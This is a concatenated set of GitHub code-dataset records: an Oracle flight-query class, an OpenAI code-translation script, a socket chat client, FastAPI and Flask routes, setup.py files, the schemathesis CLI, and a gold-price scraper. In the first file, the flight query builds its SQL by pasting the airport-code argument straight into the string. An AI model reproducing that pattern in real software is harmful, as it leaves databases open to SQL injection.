data, la companyia, el tipus d'avió, la destinacio i l'origen\n # el codi d'aeroport pot ser tant d'origen com de destÃ\n def obteLlistaVols(self,codiaero):\n self.obreConnexio() #abre la conneccion en oracle\n try: #intentamos ejecutar la parte del try y si hay algun fallo, pasara al except\n cur = self.conn.cursor() #abre coneccion con oreacle\n # sql query, los codigos de vuelos que tiene como origen BCN\n cur.execute(\"select codi_vol, data, companyia, tipus_avio, origen, destinacio from vol where origen = '\" +codiaero+\"'\")\n l=[] #lista vacia donde se guaradaran los vuelos de la sql query\n for i in cur: #recorremos la sql query\n v=Vol() #creamos un objeto vuelo\n v.readVolBBDD(i[0],i[1],i[2],i[3],i[4],i[5]) # Atribuimos el vuelo con sus atributos\n l.append(v) #añadimos el vuelo a lista de vuelos\n #sql query, los codigos de vuelos que tiene como destino BCN\n cur.execute(\"select codi_vol, data, companyia, tipus_avio, destinacio, origen from vol where destinacio = '\" + codiaero + \"'\")\n for i in cur: #recorremos la sql query\n v = Vol() #creamos un objeto vuelo\n v.readVolBBDD(i[0], i[1], i[2], i[3], i[5], i[4]) # Atribuimos el vuelo con sus atributos\n l.append(v) #añadimos el vuelo a lista de vuelos\n cur.close() #cierra la consulta\n self.tancaConnexio() #al finalizar el recorrido, se cerrara la conneccion con oracle\n return l #retorna la lista con los veulos de la sql query\n except:\n self.tancaConnexio()\n", "repo_name": "Crzek/RAsientos", "sub_path": "bbdd.py", "file_name": "bbdd.py", "file_ext": "py", "file_size_in_byte": 5616, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cx_Oracle.makedsn", "line_number": 21, "usage_type": "call"}, {"api_name": "cx_Oracle.connect", "line_number": 22, "usage_type": "call"}, {"api_name": "seient.Seient", "line_number": 56, "usage_type": "call"}, {"api_name": "vuelo.Vol", "line_number": 77, "usage_type": "call"}, {"api_name": "vuelo.Vol", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "74250274753", "text": "import os\r\nimport openai\r\nopenai.api_key = \"apikey\"\r\ndef completion(prompt):\r\n completions = openai.Completion.create(\r\n engine=\"text-davinci-002\",\r\n prompt=prompt,\r\n max_tokens=1024,\r\n n=1,\r\n stop=None,\r\n temperature=0.5,\r\n )\r\n message = completions.choices[0].text\r\n return message\r\npath = \"linux_suorce_code20230214\\\\block\\\\bfq-cgroup.c\"\r\ntopath = \"linux_go_20230214\\\\block\\\\bfq-cgroup.go\"\r\nctext = open(path,\"r\").read()\r\n#print(ctext)\r\ngotext = completion(\"请把 \"+ctext+\" 翻译成 golang语言版本\")\r\nf=open(topath,\"w\")\r\nf.write(gotext)\r\nf.close()", "repo_name": "leonglaung/linux-kernel-golang-chatgpt", "sub_path": "chatgpt04.py", "file_name": "chatgpt04.py", "file_ext": "py", "file_size_in_byte": 586, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "openai.api_key", "line_number": 3, "usage_type": "attribute"}, {"api_name": "openai.Completion.create", "line_number": 5, "usage_type": "call"}, {"api_name": "openai.Completion", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "2984470451", "text": "from socket import socket\nfrom config import host_port\n\n\nclass Client:\n def __init__(self, host_port, work=False):\n self.con = socket()\n self.con.connect(host_port)\n self.work = work\n\n def run(self):\n while True:\n msg = input()\n self.con.send(bytes(msg, encoding=\"utf-8\"))\n if msg == \"bb\":\n break\n print(self.con.recv(1024))\n self.con.close()\n\n\nif __name__ == '__main__':\n Client(host_port).run()\n", "repo_name": "N1k0lay78/one_thread_server", "sub_path": "ChatClient.py", "file_name": "ChatClient.py", "file_ext": "py", "file_size_in_byte": 500, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "socket.socket", "line_number": 7, "usage_type": "call"}, {"api_name": "config.host_port", "line_number": 8, "usage_type": "argument"}, {"api_name": "config.host_port", "line_number": 22, "usage_type": "argument"}]} +{"seq_id": "71812573314", "text": "from fastapi import status, HTTPException, Depends, APIRouter, Response\nfrom dbhelper import runSQL, runSQL_return_id\nfrom pydantic import BaseModel\nfrom oauth2 import get_current_user\n\nfrom project_helper import project_exist\n\n# tags are just for the ui\napp = APIRouter(tags=['technologies'])\n\nclass UserSkill(BaseModel):\n user_skills : dict[int,int]\n\n\n\n@app.get(\"/technologies\", status_code = status.HTTP_200_OK)\ndef get_all_technologies(user_id : int = Depends(get_current_user)):\n\n\n # get all technologies\n res = runSQL(\"SELECT * FROM technologies\")\n\n return res\n\n\n@app.put(\"/user_technologies\", status_code = status.HTTP_200_OK)\ndef get_all_technologies(skills : UserSkill, user_id : int = Depends(get_current_user)):\n\n\n for tech_id in skills.user_skills:\n print(tech_id , skills.user_skills[tech_id])\n res = runSQL(\"UPDATE users_technologies SET technology_experience = %s WHERE technology_id = %s AND user_id = %s\", (skills.user_skills[tech_id], tech_id, user_id))\n #print(res)\n\n # get all technologies\n\n return res\n ", "repo_name": "codeyescity/dev-community", "sub_path": "backend/routes/technologies.py", "file_name": "technologies.py", "file_ext": "py", "file_size_in_byte": 1068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.APIRouter", "line_number": 9, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 11, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 17, "usage_type": "call"}, {"api_name": "oauth2.get_current_user", "line_number": 17, "usage_type": "argument"}, {"api_name": "dbhelper.runSQL", "line_number": 21, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 16, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 16, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 27, "usage_type": "call"}, {"api_name": "oauth2.get_current_user", "line_number": 27, "usage_type": "argument"}, {"api_name": "dbhelper.runSQL", "line_number": 32, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 26, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "36373261674", "text": "import os\n\nfrom flask import Blueprint, render_template, request\n\nfrom common.common import RAW_V2_PATH\nfrom common.tdx import read_tdx_text\nfrom common.utils import filter_files_by_date\n\nblueprint = Blueprint('follow_bull', __name__)\n\n\ndef mode_shrink_adj(df):\n df = df[df['上次涨停'] <= 10]\n df = df[df['连缩量'] >= 1]\n df = df[df['涨幅%'] < 0]\n\n return df\n\n\ndef mode_follow_bull(df):\n df = df[df['上次涨停'] <= 10]\n df = df[df['连放量'] == 1]\n df = df[df['昨涨幅'] < 0]\n df = df[df['涨幅%'] > 0]\n\n return df\n\n\ndef mode_cont_limited_up(df):\n df = df[df['连板榜'] >= 2]\n df = df.sort_values(by='连板榜', ascending=False)\n return df\n\n\ndef mode_first_limited_up(df):\n df = df[df['首板'] == 1]\n\n return df\n\n\n@blueprint.route('/mode')\ndef mode():\n mode_list: list = [\n ('次阳', mode_follow_bull,),\n ('缩调', mode_shrink_adj,),\n ('连板', mode_cont_limited_up,),\n ('首板', mode_first_limited_up,),\n ]\n mode = request.args.get('mode', 0, type=int)\n directory_path = os.path.join(RAW_V2_PATH, '全部A股')\n file_pattern = r'(\\d{8})'\n file_pattern = f'全部A股({file_pattern}).txt'\n\n file_list = filter_files_by_date(directory_path, file_pattern)\n file_list = sorted(file_list, key=lambda x: x[1], reverse=True)\n file_list = file_list[0:30]\n\n result_dict = {}\n\n mode_call = mode_list[mode][1]\n for file_path, date in file_list:\n if not os.path.exists(file_path): continue\n df = read_tdx_text(file_path)\n df = mode_call(df)\n df = df.sort_values(by='MA5涨1', ascending=False)\n df['show'] = df['名称'].astype(str) + '|' + df['代码'].astype(str) + '|' + df['涨幅%'].astype(str) + '|' + df['MA5涨1'].astype(str)\n result_dict[f\"{date[:4]}-{date[4:6]}-{date[6:]}\"] = df['show'].to_list()\n\n template_var = {\n 'data': dict(result_dict.items()),\n 'mode_list': [item[0] for item in mode_list],\n 'request_args': {\n 'mode': mode,\n 'socket_token': request.args.get('socket_token', '', str),\n }\n }\n\n return render_template('mode.html', **template_var)\n", "repo_name": "entimm/stock", "sub_path": "controllers/mode_controller.py", "file_name": "mode_controller.py", "file_ext": "py", "file_size_in_byte": 2188, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Blueprint", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "common.common.RAW_V2_PATH", "line_number": 50, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "common.utils.filter_files_by_date", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "common.tdx.read_tdx_text", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "38194668748", "text": "import os\nfrom setuptools import setup\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name = \"imx-nand-tools\",\n version = \"1.0.3\",\n python_requires='>3.5.2',\n url='https://github.com/DigitalSecurity/imx-nand-tools',\n author = \"Damien Cauquil\",\n author_email = \"damien.cauquil@digital.security\",\n description = (\"Freescale i.MX NAND reverse tools\"),\n long_description=read(\"README.rst\"),\n license = \"MIT\",\n keywords = \"imx freescale tool\",\n packages=['imxtools'],\n install_requires=[\n 'progressbar2',\n 'termcolor',\n 'bchlib'\n ],\n entry_points= {\n 'console_scripts': [\n 'imx-nand-info=imxtools.imx_nand_info:main',\n 'imx-nand-convert=imxtools.imx_nand_convert:main'\n ]\n },\n)\n", "repo_name": "DigitalSecurity/imx-nand-tools", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 38, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "21283332703", "text": "\"\"\"Utils module, common project methods.\"\"\"\nfrom django.conf import settings\n\n\ndef has_console_access(user):\n \"\"\"Check if user has access to extra content.\"\"\"\n if user.is_staff:\n return True\n\n if not getattr(settings, 'ALLOW_CONSOLE_ACCESS', False):\n return False\n\n return user.groups.filter(name='ecomm_console_client').exists()\n", "repo_name": "eduNEXT/ecommerce-extensions", "sub_path": "ecommerce_extensions/core/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 356, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.settings", "line_number": 10, "usage_type": "argument"}]} +{"seq_id": "29131515366", "text": "import traceback\nfrom enum import Enum\nfrom typing import Callable, Dict, Generator, Iterable, List, Optional, Tuple, Union, cast\n\nimport click\nimport hypothesis\nimport requests\n\nfrom .. import checks as checks_module\nfrom .. import models, runner\nfrom ..runner import events\nfrom ..types import Filter\nfrom ..utils import WSGIResponse\nfrom . import callbacks, output\nfrom .context import ExecutionContext\nfrom .options import CSVOption, NotSet, OptionalInt\n\nCONTEXT_SETTINGS = {\"help_option_names\": [\"-h\", \"--help\"]}\n\nDEFAULT_CHECKS_NAMES = tuple(check.__name__ for check in checks_module.DEFAULT_CHECKS)\nALL_CHECKS_NAMES = tuple(check.__name__ for check in checks_module.ALL_CHECKS)\nCHECKS_TYPE = click.Choice((*ALL_CHECKS_NAMES, \"all\"))\nDEFAULT_WORKERS = 1\nMAX_WORKERS = 64\n\n\ndef register_check(function: Callable[[Union[requests.Response, WSGIResponse], models.Case], None]) -> None:\n \"\"\"Register a new check for schemathesis CLI.\"\"\"\n checks_module.ALL_CHECKS += (function,)\n CHECKS_TYPE.choices += (function.__name__,) # type: ignore\n\n\n@click.group(context_settings=CONTEXT_SETTINGS)\n@click.option(\"--pre-run\", help=\"A module to execute before the running the tests.\", type=str)\n@click.version_option()\ndef schemathesis(pre_run: Optional[str] = None) -> None:\n \"\"\"Command line tool for testing your web application built with Open API / Swagger specifications.\"\"\"\n if pre_run:\n load_hook(pre_run)\n\n\n@schemathesis.command(short_help=\"Perform schemathesis test.\")\n@click.argument(\"schema\", type=str, callback=callbacks.validate_schema)\n@click.option(\n \"--checks\", \"-c\", multiple=True, help=\"List of checks to run.\", type=CHECKS_TYPE, default=DEFAULT_CHECKS_NAMES\n)\n@click.option(\n \"-x\", \"--exitfirst\", \"exit_first\", is_flag=True, default=False, help=\"Exit instantly on first error or failed test.\"\n)\n@click.option(\n \"--auth\", \"-a\", help=\"Server user and password. Example: USER:PASSWORD\", type=str, callback=callbacks.validate_auth\n)\n@click.option(\n \"--auth-type\",\n \"-A\",\n type=click.Choice([\"basic\", \"digest\"], case_sensitive=False),\n default=\"basic\",\n help=\"The authentication mechanism to be used. Defaults to 'basic'.\",\n)\n@click.option(\n \"--header\",\n \"-H\",\n \"headers\",\n help=r\"Custom header in a that will be used in all requests to the server. Example: Authorization: Bearer\\ 123\",\n multiple=True,\n type=str,\n callback=callbacks.validate_headers,\n)\n@click.option(\n \"--endpoint\",\n \"-E\",\n \"endpoints\",\n type=str,\n multiple=True,\n help=r\"Filter schemathesis test by endpoint pattern. Example: users/\\d+\",\n callback=callbacks.validate_regex,\n)\n@click.option(\n \"--method\",\n \"-M\",\n \"methods\",\n type=str,\n multiple=True,\n help=\"Filter schemathesis test by HTTP method.\",\n callback=callbacks.validate_regex,\n)\n@click.option(\n \"--tag\",\n \"-T\",\n \"tags\",\n type=str,\n multiple=True,\n help=\"Filter schemathesis test by schema tag pattern.\",\n callback=callbacks.validate_regex,\n)\n@click.option(\n \"--workers\",\n \"-w\",\n \"workers_num\",\n help=\"Number of workers to run tests.\",\n type=click.IntRange(1, MAX_WORKERS),\n default=DEFAULT_WORKERS,\n)\n@click.option(\n \"--base-url\",\n \"-b\",\n help=\"Base URL address of the API, required for SCHEMA if specified by file.\",\n type=str,\n callback=callbacks.validate_base_url,\n)\n@click.option(\"--app\", help=\"WSGI application to test.\", type=str, callback=callbacks.validate_app)\n@click.option(\n \"--request-timeout\",\n help=\"Timeout in milliseconds for network requests during the test run.\",\n type=click.IntRange(1),\n)\n@click.option(\"--validate-schema\", help=\"Enable or disable validation of input schema.\", type=bool, default=True)\n@click.option(\"--show-errors-tracebacks\", help=\"Show full tracebacks for internal errors.\", is_flag=True, default=False)\n@click.option(\n \"--hypothesis-deadline\",\n help=\"Duration in milliseconds that each individual example with a test is not allowed to exceed.\",\n # max value to avoid overflow. It is maximum amount of days in milliseconds\n type=OptionalInt(1, 999999999 * 24 * 3600 * 1000),\n)\n@click.option(\"--hypothesis-derandomize\", help=\"Use Hypothesis's deterministic mode.\", is_flag=True, default=None)\n@click.option(\n \"--hypothesis-max-examples\",\n help=\"Maximum number of generated examples per each method/endpoint combination.\",\n type=click.IntRange(1),\n)\n@click.option(\"--hypothesis-phases\", help=\"Control which phases should be run.\", type=CSVOption(hypothesis.Phase))\n@click.option(\n \"--hypothesis-report-multiple-bugs\", help=\"Raise only the exception with the smallest minimal example.\", type=bool\n)\n@click.option(\"--hypothesis-seed\", help=\"Set a seed to use for all Hypothesis tests.\", type=int)\n@click.option(\n \"--hypothesis-suppress-health-check\",\n help=\"Comma-separated list of health checks to disable.\",\n type=CSVOption(hypothesis.HealthCheck),\n)\n@click.option(\n \"--hypothesis-verbosity\",\n help=\"Verbosity level of Hypothesis messages.\",\n type=click.Choice([item.name for item in hypothesis.Verbosity]),\n callback=callbacks.convert_verbosity,\n)\ndef run( # pylint: disable=too-many-arguments\n schema: str,\n auth: Optional[Tuple[str, str]],\n auth_type: str,\n headers: Dict[str, str],\n checks: Iterable[str] = DEFAULT_CHECKS_NAMES,\n exit_first: bool = False,\n endpoints: Optional[Filter] = None,\n methods: Optional[Filter] = None,\n tags: Optional[Filter] = None,\n workers_num: int = DEFAULT_WORKERS,\n base_url: Optional[str] = None,\n app: Optional[str] = None,\n request_timeout: Optional[int] = None,\n validate_schema: bool = True,\n show_errors_tracebacks: bool = False,\n hypothesis_deadline: Optional[Union[int, NotSet]] = None,\n hypothesis_derandomize: Optional[bool] = None,\n hypothesis_max_examples: Optional[int] = None,\n hypothesis_phases: Optional[List[hypothesis.Phase]] = None,\n hypothesis_report_multiple_bugs: Optional[bool] = None,\n hypothesis_suppress_health_check: Optional[List[hypothesis.HealthCheck]] = None,\n hypothesis_seed: Optional[int] = None,\n hypothesis_verbosity: Optional[hypothesis.Verbosity] = None,\n) -> None:\n \"\"\"Perform schemathesis test against an API specified by SCHEMA.\n\n SCHEMA must be a valid URL or file path pointing to an Open API / Swagger specification.\n \"\"\"\n # pylint: disable=too-many-locals\n\n if \"all\" in checks:\n selected_checks = checks_module.ALL_CHECKS\n else:\n selected_checks = tuple(check for check in checks_module.ALL_CHECKS if check.__name__ in checks)\n\n prepared_runner = runner.prepare(\n schema,\n auth=auth,\n auth_type=auth_type,\n headers=headers,\n request_timeout=request_timeout,\n base_url=base_url,\n endpoint=endpoints,\n method=methods,\n tag=tags,\n app=app,\n seed=hypothesis_seed,\n exit_first=exit_first,\n checks=selected_checks,\n workers_num=workers_num,\n validate_schema=validate_schema,\n hypothesis_deadline=hypothesis_deadline,\n hypothesis_derandomize=hypothesis_derandomize,\n hypothesis_max_examples=hypothesis_max_examples,\n hypothesis_phases=hypothesis_phases,\n hypothesis_report_multiple_bugs=hypothesis_report_multiple_bugs,\n hypothesis_suppress_health_check=hypothesis_suppress_health_check,\n hypothesis_verbosity=hypothesis_verbosity,\n )\n execute(prepared_runner, workers_num, show_errors_tracebacks)\n\n\ndef get_output_handler(workers_num: int) -> Callable[[ExecutionContext, events.ExecutionEvent], None]:\n if workers_num > 1:\n output_style = OutputStyle.short\n else:\n output_style = OutputStyle.default\n return cast(Callable[[ExecutionContext, events.ExecutionEvent], None], output_style)\n\n\ndef load_hook(module_name: str) -> None:\n \"\"\"Load the given hook by importing it.\"\"\"\n try:\n __import__(module_name)\n except Exception:\n click.secho(\"An exception happened during the hook loading:\\n\", fg=\"red\")\n message = traceback.format_exc()\n click.secho(message, fg=\"red\")\n raise click.Abort()\n\n\nclass OutputStyle(Enum):\n \"\"\"Provide different output styles.\"\"\"\n\n default = output.default.handle_event\n short = output.short.handle_event\n\n\ndef execute(\n prepared_runner: Generator[events.ExecutionEvent, None, None], workers_num: int, show_errors_tracebacks: bool\n) -> None:\n \"\"\"Execute a prepared runner by drawing events from it and passing to a proper handler.\"\"\"\n handler = get_output_handler(workers_num)\n context = ExecutionContext(workers_num=workers_num, show_errors_tracebacks=show_errors_tracebacks)\n for event in prepared_runner:\n handler(context, event)\n", "repo_name": "borisrny/efforte1", "sub_path": "venv/lib/python3.7/site-packages/schemathesis/cli/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 8780, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "click.Choice", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 27, "usage_type": "name"}, {"api_name": "requests.Response", "line_number": 27, "usage_type": "attribute"}, {"api_name": "utils.WSGIResponse", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 36, "usage_type": "name"}, {"api_name": "click.group", "line_number": 33, "usage_type": "call"}, {"api_name": "click.option", "line_number": 34, "usage_type": "call"}, {"api_name": "click.version_option", "line_number": 35, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 151, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 152, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 154, "usage_type": "name"}, {"api_name": "types.Filter", "line_number": 154, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 155, "usage_type": "name"}, {"api_name": "types.Filter", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 156, "usage_type": "name"}, {"api_name": "types.Filter", "line_number": 156, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 160, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 163, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 163, "usage_type": "name"}, {"api_name": "options.NotSet", "line_number": 163, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 164, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 165, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 166, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 166, "usage_type": "name"}, {"api_name": "hypothesis.Phase", "line_number": 166, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 167, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 168, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 168, "usage_type": "name"}, {"api_name": "hypothesis.HealthCheck", "line_number": 168, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 169, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 170, "usage_type": "name"}, {"api_name": "hypothesis.Verbosity", "line_number": 170, "usage_type": "attribute"}, {"api_name": "runner.prepare", "line_number": 183, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 43, "usage_type": "call"}, {"api_name": "click.option", "line_number": 44, "usage_type": "call"}, {"api_name": "click.option", "line_number": 47, "usage_type": "call"}, {"api_name": "click.option", "line_number": 50, "usage_type": "call"}, {"api_name": "click.option", "line_number": 53, "usage_type": "call"}, {"api_name": "click.Choice", "line_number": 56, "usage_type": "call"}, {"api_name": "click.option", "line_number": 60, "usage_type": "call"}, {"api_name": "click.option", "line_number": 69, "usage_type": "call"}, {"api_name": "click.option", "line_number": 78, "usage_type": "call"}, {"api_name": "click.option", "line_number": 87, "usage_type": "call"}, {"api_name": "click.option", "line_number": 96, "usage_type": "call"}, {"api_name": "click.IntRange", "line_number": 101, "usage_type": "call"}, {"api_name": "click.option", "line_number": 104, "usage_type": "call"}, {"api_name": "click.option", "line_number": 111, "usage_type": "call"}, {"api_name": "click.option", "line_number": 112, "usage_type": "call"}, {"api_name": "click.IntRange", "line_number": 115, "usage_type": "call"}, {"api_name": "click.option", "line_number": 117, "usage_type": "call"}, {"api_name": "click.option", "line_number": 118, "usage_type": "call"}, {"api_name": "click.option", "line_number": 119, "usage_type": "call"}, {"api_name": "options.OptionalInt", "line_number": 123, "usage_type": "call"}, {"api_name": "click.option", "line_number": 125, "usage_type": "call"}, {"api_name": "click.option", "line_number": 126, "usage_type": "call"}, {"api_name": "click.IntRange", "line_number": 129, "usage_type": "call"}, {"api_name": "click.option", "line_number": 131, "usage_type": "call"}, {"api_name": "options.CSVOption", "line_number": 131, "usage_type": "call"}, {"api_name": "hypothesis.Phase", "line_number": 131, "usage_type": "attribute"}, {"api_name": "click.option", "line_number": 132, "usage_type": "call"}, {"api_name": "click.option", "line_number": 135, "usage_type": "call"}, {"api_name": "click.option", "line_number": 136, "usage_type": "call"}, {"api_name": "options.CSVOption", "line_number": 139, "usage_type": "call"}, {"api_name": "hypothesis.HealthCheck", "line_number": 139, "usage_type": "attribute"}, {"api_name": "click.option", "line_number": 141, "usage_type": "call"}, {"api_name": "click.Choice", "line_number": 144, "usage_type": "call"}, {"api_name": "hypothesis.Verbosity", "line_number": 144, "usage_type": "attribute"}, {"api_name": "typing.cast", "line_number": 215, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 215, "usage_type": "name"}, {"api_name": "context.ExecutionContext", "line_number": 215, "usage_type": "name"}, {"api_name": "runner.events.ExecutionEvent", "line_number": 215, "usage_type": "attribute"}, {"api_name": "runner.events", "line_number": 215, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 210, "usage_type": "name"}, {"api_name": "context.ExecutionContext", "line_number": 210, "usage_type": "name"}, {"api_name": "runner.events.ExecutionEvent", "line_number": 210, "usage_type": "attribute"}, {"api_name": "runner.events", "line_number": 210, "usage_type": "name"}, {"api_name": "click.secho", "line_number": 223, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 224, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 225, "usage_type": "call"}, {"api_name": "click.Abort", "line_number": 226, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 229, "usage_type": "name"}, {"api_name": "typing.Generator", "line_number": 237, "usage_type": "name"}, {"api_name": "runner.events.ExecutionEvent", "line_number": 237, "usage_type": "attribute"}, {"api_name": "runner.events", "line_number": 237, "usage_type": "name"}, {"api_name": "context.ExecutionContext", "line_number": 241, "usage_type": "call"}]} +{"seq_id": "23989190191", "text": "# -*- coding: utf-8 -*-\n\nfrom distutils.core import setup\nfrom setuptools import find_packages\n\nversion = __import__('my_project').__version__\n\n\nsetup(\n name='my-project',\n version=version,\n author=u'Rubén Pardo',\n author_email='yosoyruben@gmail.com',\n packages=find_packages(),\n url='https://github.com/wen96/django-boilerplate',\n license='MIT',\n description='Example packaging',\n long_description='Example packaging',\n include_package_data=True\n)\n", "repo_name": "wen96/django-boilerplate", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "distutils.core.setup", "line_number": 9, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "14404443176", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport json\nimport os\n\ndef get_data():\n \"\"\"\n gets the price of gold for each year from 1969 to 2023\n \"\"\"\n url = 'https://www.macrotrends.net/1333/historical-gold-prices-100-year-chart'\n response = requests.get(url, headers= {'User-Agent': 'Mozilla/5.0'})\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # parsing html to get the right table\n table = soup.find('table', {'class': 'table'})\n\n table_data = []\n\n for row in table.find_all('tr'):\n row_data = []\n for cell in row.find_all(['th', 'td']):\n row_data.append(cell.text.strip())\n table_data.append(row_data)\n\n\n # 0th element is table name 1st element are column names 2nd and forward elements are data\n df = pd.DataFrame(table_data[2:], columns=table_data[1])\n df.to_csv('table_data.csv', index=False)\n\n\n folder_path = 'UVP-project\\data'\n file_name = 'gold_prices.json'\n\n directory_path = os.path.join(os.getcwd(), folder_path)\n\n if not os.path.exists(directory_path):\n os.makedirs(directory_path)\n\n file_path = os.path.join(directory_path, file_name)\n\n\n # making content of the file\n gold_prices_JSON = {}\n for index, row in enumerate(table_data):\n if index > 2:\n gold_prices_JSON[row[0]] = {}\n gold_prices_JSON[row[0]]['Average closing price'] = row[1]\n gold_prices_JSON[row[0]]['Annual percentage change'] = row[6]\n\n jsonString = json.dumps(gold_prices_JSON)\n\n\n with open(file_path, \"w\") as jsonFile:\n jsonFile.write(jsonString)\n\n\nget_data()\n#all prices are for ounce of gold\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "NikZivkovicKokalj/UVP-project", "sub_path": "get_data/gold_prices.py", "file_name": "gold_prices.py", "file_ext": "py", "file_size_in_byte": 1674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "28729166558", "text": "# -*- coding: UTF-8 -*-\n\"\"\"\n aliyun.ecs\n ~~~~~~~~~~~\n\"\"\"\nfrom utils import scan_page\nfrom base import *\nfrom aliyunsdkecs.request.v20140526 import DescribeInstancesRequest as ECSRequest\nfrom aliyunsdkecs.request.v20140526 import DescribeDisksRequest as DisksRequest\n\n\nclass ECS(AliyunBase):\n @classmethod\n @scan_page\n def get_instances(cls, page_num=1, page_size=50):\n request = ECSRequest.DescribeInstancesRequest\n responses = cls.do_request(request, page_num, page_size)\n ret = []\n for clt, resp in 